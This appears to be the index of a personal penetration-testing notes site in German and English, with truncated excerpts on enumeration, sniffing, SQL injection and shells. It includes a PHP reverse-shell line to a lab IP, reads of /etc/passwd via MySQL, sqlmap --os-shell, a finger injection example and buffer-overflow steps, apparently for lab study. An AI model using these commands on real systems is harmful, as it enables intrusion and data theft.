tcp/135 udp/135 — and as (Microsoft) Remote Procedure Call on tcp/593 as web service. Enumeration Obtain general information # rpcinfo -p $target # rpcinfo -s $target Connect. Hint: auto completion works; enum<tab> returns all enum commands. rpcclient -U "" $target Enumerate through all API endpoints with one of the following options. python /usr/local/bin/rpcdump.py $target |…
Enumeration Aktuell angemeldete Benutzer anzeigen finger @ip Benutzer-Enumeration for username in $(cat cirt-default-usernames.txt); do finger $username@10.10.10.76 >> /tmp/finger; done Enumeration mit Metasploit: msf5 > use auxiliary/scanner/finger/finger_users msf5 auxiliary(scanner/finger/finger_users) > set rhosts 10.10.10.76 rhosts => 10.10.10.76 msf5 auxiliary(scanner/finger/finger_users) > run Exploits Auf sehr alten Systemen konnte man https://insecure.org/sploits_all.html zufolge Befehle ausführen, etwa mit finger "|/bin/id@host'
Use the bof1_web.py or bof1_socket.py to start. Use bof1_socket_10.py to determine the position of the EIP. Use bof2_socket_20.py with the found EIP offset to verify that the EIP was overwritten with B’s. Use bof3_socket_10.py with the found EIP and find all bad chars. Find with Mona a JMP address. Create payload, add it and €profit. 0. Confirm vulnerability Download…
Note that iptables and ip6tables should be used always together! Tables Iptables manages a set of tables which act as ACL Access Control Lists. Actions Actions are defined via the -j option. Examples Show all rules iptables -Lip6tables -L Ignore all packets from a network: iptables -A INPUT -s 192.168.5.1/32 -j DROPip6tables -A INPUT -s fd75:943b:5f2e:0:a4:45a1:b753:4152 -j…
tcpdump Get incoming ICMP packets: sudo tcpdump -i any icmp and src host $target Nützliche Parameter Domains nicht auflösen, IPs anzeigen -n Dump der Daten anzeigen -X Paket in ASCII anzeigen -A Umgang mit Dateien Dump in Datei schreiben tcpdump -w file Dump aus Datei lesen tcpdump -r file Standard-Abfragen tcpdump -n src|dst 10.10.10.10 and port…
See a packet in its context Kontextmenü, Follow auswählen Show only ICMP packets from a host tcpdump host 10.11.1.128 and icmp -i tun0 Show other systems communicating outside the own address ip.addr == 10.11.1.0/24 && !(ip.addr == 192.168.119.0/24) && ! dns && !browser && !ssdp && !nbns && !llmnr Record audio Wireshark can transform captured audio…
Screen-Sitzung mit Namen starten screen -S name Screen-Sitzungen auflisten screen -ls Screen-Sitzung fortsetzen screen -xS name
Connect: mysql --host=10.10.10.13 -P4444 -u admin admin Various commands: Enumeration Nmap scripts nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $victim proxychains4 -q nmap -sV -sT -Pn -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $victim Exploitation Read and write Read with the current process id: SELECT load_file('/etc/passwd'); Write as the daemon process id: CREATE TABLE bbb(content TEXT); INSERT INTO bbb (content)…
Before < 2.2.10 : SQL injection possible (https://packetstormsecurity.com/files/152356/CMS-Made-Simple-SQL-Injection.html)
Use dash, which doesn’t drop privileges. Arguments ls Order by the last recent modified file: ls -t Better history Add this to .bashrc HISTSIZE=10000 HISTTIMEFORMAT='%F %T ' Handling from files with starting - cp -- -file.txt file.txt STDOUT, STDIN and STDERR (redirection) Output STDERR (2) also on STDOUT (1) cmd 2>&1 man Seaching for a keyword in…
Routing-Tabelle ansehen netstat -r Schnelle Ausgabe ohne DNS-Auflösung, nur IPs: netstat -n Nur TCP-Verbindungen anzeigen netstat -t Nur UDP-Verbindungen anzeigen netstat -u Programm anzeigen, dass offene Verbindung benutzt netstat -p Netzwerkstatistik anzeigen netstat -s
Namenskonfusion Datei ausliefern: echo -e "HTTP/1.1 200 OK\nContent-Length: 5\n\nHallo" | nc -l localhost 8000 Datei anfragen über SSL: echo -e "GET / HTTP/1.1\nHost: localhost\n\n" | ncat -C --ssl localhost 443 Gebe Ausgabe von Programm zurück: ncat -l localhost 3000 --exec /bin/date Datei direkt übertragen (unverschlüsselt!): 1. Empfänger: user@host02:~$ ncat -l > aha oder nc -nlvp 4444…
https://github.com/diego-treitos/linux-smart-enumeration This script will show relevant information about the security of the local Linux system. Quick install Details from the manual It has 3 levels of verbosity so you can control how much information you see. In the default level you should see the highly important security flaws in the system. The level 1 (./lse.sh -l1)…
IF THE METERPRETER SHELL STUCKS, TRY TO ENTER ENTER MULTIPLE TIMES ON THE VICTIM. Aufbauen Lausche auf einem System, dass erreicht werden kann z.B. mit nc -lnvp 9998 [l=listen,v=verbose,p=port,n=no_resolution] Initiiere dann die Verbindung vom Zielsystem. Hier ein Beispiel direkt in PHP: <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'"); ?> Anderes Beispiel, z.B. direkt in einer Konsole…
Standard case: $ python sqlmap.py -u http://10.10.10.140/index.php/catalogsearch/result/?q=e More aggresive: Dump DB: sqlmap -u http://target/command.php?id=564 --dbms=mysql --dump --threads=5 sqlmap -u http://target/command.php?id=564 --dbms=mysql --tables Get shell: sqlmap -u http://target/command.php?id=564 --dbms=mysql --os-shell Use an existing HTTP request as template. E.g. store a request in a text file: POST /index.php HTT/1.1Header: value... Then, use sqlmap with this file request.txt: sqlmap -r…
With knockd a server can be configured to respond only after some ports were checked before. Its often used for SSH. Coutermeasure: Sniff traffic and wait for an user to login and reconstruct the knocking pattern out of the pcaps.
Note that FTP doesn’t show hidden files! Try in Windows e.g “cd ProgramData”. Enumeration With nmap. Scans a network for ftp servers which allow anonymous access. nmap -v -p21 --script=ftp-anon.nse 10.11.1.1-254 FTP relays The FTP specification defines FTP relays. One FTP server can say to another FTP server to send files to another third-party server.…
General notes NC / Netcat Try netcat first on interesting ports or narrow port ranges to be more silent Network scan Choose a port which is probably open on systems on this network. E.g. 445 for Windows hosts or 22 for Linux hosts. for i in $(seq 1 254); do nc -zv -w 1 10.10.10.$i 445;…
Linux Detect IPv6 hosts There is no arp table like in Ethernet/IPv4. But we can simulate is as follows to list all neightbours / directly reachable hosts: ping6 -c 5 ff02::1%eth0 >/dev/null ip -6 neigh Bonus: ip neigh shows the IPv4 address resolution table like the arp command does. Detect IPv6 addresses for known IPv4 addresses Scenario:…
Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.
Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.
python -c 'import pty;pty.spawn("/bin/bash")';
python3 -c 'import pty;pty.spawn("/bin/bash")';